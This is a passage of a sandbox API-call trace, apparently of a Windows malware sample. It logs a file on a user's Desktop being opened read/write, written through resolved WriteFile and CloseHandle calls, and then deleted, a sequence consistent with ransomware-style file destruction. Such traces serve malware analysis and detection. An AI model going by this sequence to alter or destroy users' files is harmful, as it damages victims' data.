lpMsg=0x61e8f4) returned 0 [0075.384] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb378 [0075.384] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dbd0 [0075.384] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e3f0 [0075.384] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb5e8 [0075.384] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.384] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb378 [0075.384] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dbd0 [0075.384] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e6a8 [0075.384] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb5e8 [0075.385] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.385] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb378 [0075.385] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dbd0 [0075.385] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e3f0 [0075.385] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb5e8 [0075.385] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.385] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb378 [0075.385] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dbd0 [0075.385] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e6a8 [0075.385] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb5e8 [0075.385] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.385] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dbd0 [0075.385] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e3f0 [0075.385] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb378 [0075.385] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e6a8 [0075.385] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e630 [0075.385] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb5e8 [0075.385] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0075.385] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76dfd0 [0075.385] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb508 [0075.385] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb4f8 [0075.385] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76acd0 [0075.385] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76d30000 [0075.385] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76dfd0 [0075.385] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb528 [0075.385] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0075.385] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x76acd0 [0075.385] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x76acd0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0075.386] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\I_yvZxV2VbG06XDhaG1Z.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\-bwohngaeohzwnbtd\\i_yvzxv2vbg06xdhag1z.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x128 [0075.386] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb5b8 [0075.386] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x214) returned 0x792010 [0075.386] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dab8 [0075.386] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76dfd0 [0075.386] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76acd0 [0075.386] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e648 [0075.386] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb4b8 [0075.387] FreeLibrary (hLibModule=0x76d30000) returned 1 [0075.387] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.387] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb5e8 [0075.387] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x6a1b68 [0075.387] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb3d8 [0075.387] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.387] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb5e8 [0075.387] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb3d8 [0075.387] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.387] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690810 [0075.387] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x30) returned 0x692d08 [0075.387] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0075.387] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0075.387] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dd10 [0075.388] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76acd0 [0075.388] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb378 [0075.388] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e648 [0075.388] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76dfd0 [0075.388] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb5b8 [0075.388] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0075.388] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e1f8 [0075.388] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb558 [0075.388] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb5f8 [0075.388] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e3d8 [0075.388] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76d30000 [0075.388] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e1f8 [0075.388] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb498 [0075.388] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WriteFile", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0075.388] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xa) returned 0x76e3d8 [0075.388] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WriteFile", cchWideChar=10, lpMultiByteStr=0x76e3d8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WriteFile", lpUsedDefaultChar=0x0) returned 10 [0075.389] FreeLibrary (hLibModule=0x76d30000) returned 1 [0075.389] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0075.389] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb5b8 [0075.389] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x6a1b68 [0075.389] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb4b8 [0075.389] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0075.389] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb5b8 [0075.389] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb4b8 [0075.389] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0075.389] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb5b8 [0075.389] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb4b8 [0075.389] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.389] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690660 [0075.389] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x30) returned 0x692d08 [0075.389] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0075.390] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0075.390] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dd60 [0075.390] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e6a8 [0075.390] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6906c0 [0075.390] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76acd0 [0075.390] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e648 [0075.390] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690810 [0075.390] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0075.390] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e528 [0075.390] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6908b0 [0075.390] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690800 [0075.390] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e030 [0075.390] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76d30000 [0075.390] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e528 [0075.390] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690780 [0075.390] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0075.390] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x76e030 [0075.390] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x76e030, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0075.391] FreeLibrary (hLibModule=0x76d30000) returned 1 [0075.391] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0075.391] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690810 [0075.391] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x6a1b68 [0075.391] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690910 [0075.391] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0075.391] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690810 [0075.391] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690910 [0075.391] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.391] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dc70 [0075.391] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e3f0 [0075.391] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690660 [0075.391] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e618 [0075.391] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\I_yvZxV2VbG06XDhaG1Z.mp4", nBufferLength=0x7fff, lpBuffer=0x60ea80, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\I_yvZxV2VbG06XDhaG1Z.mp4", lpFilePart=0x0) returned 0x50 [0075.392] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\I_yvZxV2VbG06XDhaG1Z.mp4", lpFindFileData=0x61eac8 | out: lpFindFileData=0x61eac8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfaca41e0, ftCreationTime.dwHighDateTime=0x1d5e740, ftLastAccessTime.dwLowDateTime=0x9aebd660, ftLastAccessTime.dwHighDateTime=0x1d5e6d4, ftLastWriteTime.dwLowDateTime=0xc9b5ea80, ftLastWriteTime.dwHighDateTime=0x1d661bd, nFileSizeHigh=0x0, nFileSizeLow=0x1040, dwReserved0=0x63f910, dwReserved1=0x77cb1ecd, cFileName="I_yvZxV2VbG06XDhaG1Z.mp4", cAlternateFileName="I_YVZX~1.MP4")) returned 0x6b8b38 [0075.392] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\I_yvZxV2VbG06XDhaG1Z.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\-bwohngaeohzwnbtd\\i_yvzxv2vbg06xdhag1z.mp4")) returned 1 [0075.393] FindNextFileW (in: hFindFile=0x6b8b38, lpFindFileData=0x61eac8 | out: lpFindFileData=0x61eac8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfaca41e0, ftCreationTime.dwHighDateTime=0x1d5e740, ftLastAccessTime.dwLowDateTime=0x9aebd660, ftLastAccessTime.dwHighDateTime=0x1d5e6d4, ftLastWriteTime.dwLowDateTime=0xc9b5ea80, ftLastWriteTime.dwHighDateTime=0x1d661bd, nFileSizeHigh=0x0, nFileSizeLow=0x1040, dwReserved0=0x63f910, dwReserved1=0x77cb1ecd, cFileName="I_yvZxV2VbG06XDhaG1Z.mp4", cAlternateFileName="I_YVZX~1.MP4")) returned 0 [0075.393] FindClose (in: hFindFile=0x6b8b38 | out: hFindFile=0x6b8b38) returned 1 [0075.393] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.393] PeekMessageW (in: lpMsg=0x61f07c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f07c) returned 0 [0075.393] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d9c8 [0075.393] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76df58 [0075.394] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690980 [0075.394] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ab98 [0075.394] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690960 [0075.394] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f96c8 [0075.394] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e210 [0075.394] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690b40 [0075.394] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x40) returned 0x74b420 [0075.394] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0075.394] PeekMessageW (in: lpMsg=0x61ec4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ec4c) returned 0 [0075.394] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68de78 [0075.394] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ae80 [0075.394] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690790 [0075.394] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0075.394] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p4", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0075.394] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mp4", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0075.394] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mp4", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0075.394] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ac70 | out: hHeap=0x650000) returned 1 [0075.394] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e540 | out: hHeap=0x650000) returned 1 [0075.394] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e5d0 | out: hHeap=0x650000) returned 1 [0075.394] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e078 | out: hHeap=0x650000) returned 1 [0075.394] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e3a8 | out: hHeap=0x650000) returned 1 [0075.394] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e3f0 | out: hHeap=0x650000) returned 1 [0075.394] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dc20 | out: hHeap=0x650000) returned 1 [0075.394] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690850 | out: hHeap=0x650000) returned 1 [0075.394] PeekMessageW (in: lpMsg=0x61ec4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ec4c) returned 0 [0075.394] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690850 [0075.394] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6906b0 [0075.395] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906b0 | out: hHeap=0x650000) returned 1 [0075.395] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690850 | out: hHeap=0x650000) returned 1 [0075.395] PeekMessageW (in: lpMsg=0x61ec4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ec4c) returned 0 [0075.395] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dc20 [0075.395] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e3f0 [0075.395] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690850 [0075.395] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e3f0 | out: hHeap=0x650000) returned 1 [0075.395] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dc70 [0075.395] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e3f0 [0075.395] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e3a8 [0075.395] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6906b0 [0075.395] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e3a8 | out: hHeap=0x650000) returned 1 [0075.395] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dbd0 [0075.395] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e3a8 [0075.395] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690930 [0075.395] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e078 [0075.395] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690930 | out: hHeap=0x650000) returned 1 [0075.395] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e5d0 [0075.395] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690930 [0075.395] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dd60 [0075.395] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e540 [0075.395] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690660 [0075.395] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ac70 [0075.395] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690660 | out: hHeap=0x650000) returned 1 [0075.395] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ac70 | out: hHeap=0x650000) returned 1 [0075.395] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e540 | out: hHeap=0x650000) returned 1 [0075.395] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dd60 | out: hHeap=0x650000) returned 1 [0075.395] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690660 [0075.395] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6906c0 [0075.395] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f96c8 [0075.395] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690780 [0075.396] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f96e8 [0075.396] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690780 | out: hHeap=0x650000) returned 1 [0075.396] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906c0 | out: hHeap=0x650000) returned 1 [0075.396] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f96e8 | out: hHeap=0x650000) returned 1 [0075.396] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f96c8 | out: hHeap=0x650000) returned 1 [0075.396] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690660 | out: hHeap=0x650000) returned 1 [0075.396] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690930 | out: hHeap=0x650000) returned 1 [0075.396] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e540 [0075.396] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690930 [0075.396] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ac70 [0075.396] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e078 | out: hHeap=0x650000) returned 1 [0075.396] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e3a8 | out: hHeap=0x650000) returned 1 [0075.396] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e5d0 | out: hHeap=0x650000) returned 1 [0075.396] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dbd0 | out: hHeap=0x650000) returned 1 [0075.396] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906b0 | out: hHeap=0x650000) returned 1 [0075.396] PeekMessageW (in: lpMsg=0x61ec4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ec4c) returned 0 [0075.396] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6906b0 [0075.396] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dbd0 [0075.396] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e5d0 [0075.396] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690660 [0075.396] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e3a8 [0075.396] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690660 | out: hHeap=0x650000) returned 1 [0075.396] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e078 [0075.396] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690660 [0075.396] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6906c0 [0075.396] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f96c8 [0075.396] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f96c8 | out: hHeap=0x650000) returned 1 [0075.396] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906c0 | out: hHeap=0x650000) returned 1 [0075.396] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690660 | out: hHeap=0x650000) returned 1 [0075.396] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 